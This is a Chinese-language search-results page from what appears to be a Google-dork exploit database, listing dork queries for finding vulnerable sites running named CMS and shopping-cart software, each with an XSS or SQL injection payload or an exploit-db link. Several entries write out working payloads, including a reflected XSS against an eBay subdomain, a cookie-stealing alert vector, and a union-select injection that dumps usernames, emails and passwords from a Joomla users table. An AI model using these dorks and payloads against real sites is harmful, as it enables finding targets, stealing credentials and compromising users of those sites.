搜索 “XSS”

不再关注网络安全

site:ebay.com inurl:callback

  • 2011-02-11
  • shdb
  • 1674 阅读

Returns: http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=? then: http://sea.ebay.com/jplocal/campany/getcampnum.php?callback=?xxxx%3Cimg%20src=1%20onerror=alert(1)%3E Can also use: http://seclists.org/fulldisclosure/2011/Feb/199 XSS th...

Photo Gallery powered by TinyWebGallery 1.8.3

  • 2011-02-01
  • shdb
  • 2335 阅读

Multiple Vulnerabilities: Non-persistent XSS + Directory Traversal: https://www.exploit-db.com/exploits/16090

"powered by simpleview CMS"

  • 2010-12-15
  • shdb
  • 1229 阅读

Author: Sun Army XSS: /search/?searchString=">alert(document.cookie)&submitSearch.x=17&submitSearch.y=13

"Powered By PageAdmin CMS Free Version"

  • 2010-12-15
  • shdb
  • 1490 阅读

Author: Sun Army XSS: /include/search.aspx?keycode=">xss ByTakpar&type=1&language=en

inurl:"index.php?option=com_competitions"

  • 2010-11-25
  • shdb
  • 1830 阅读

SQL Injection: http://127.0.0.1/index.php?option=com_competitions&task=view&id=-9 union all select 1,2,3,4,group_concat(username,0x3a,email,0x3a,password),6,7 from jos_users-- and XSS: http://127.0.0.1/index.php?option=com_competitions&...

[ Copyright 2005-2006 phpDirectorySourceâ„¢, all rights reserved ]

  • 2010-11-15
  • shdb
  • 1907 阅读

phpDirectorySource (XSS/SQL) Multiple Remote Vulnerabilities - CVE: 2009-4681: https://www.exploit-db.com/exploits/9226

inurl:.asp? Powered by Comersus ASP Shopping Cart

  • 2010-11-15
  • shdb
  • 2720 阅读

Comersus ASP Shopping Cart (DD/XSS) Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/7259

inurl:"cameralife/index.php"

  • 2010-11-15
  • shdb
  • 1877 阅读

Camera Life 2.6.2b4 (SQL/XSS) Multiple Remote Vulnerabilities - CVE: 2008-6087: https://www.exploit-db.com/exploits/6710

Powered by iScripts eSwap.

  • 2010-11-15
  • shdb
  • 2074 阅读

iScripts eSwap v2.0 sqli and xss vulnerability: https://www.exploit-db.com/exploits/13740

"Powered by [ iSupport 1.8 ]"

  • 2010-11-15
  • shdb
  • 1787 阅读

iSupport 1.8 XSS/LFI - CVE: 2009-4434: https://www.exploit-db.com/exploits/10478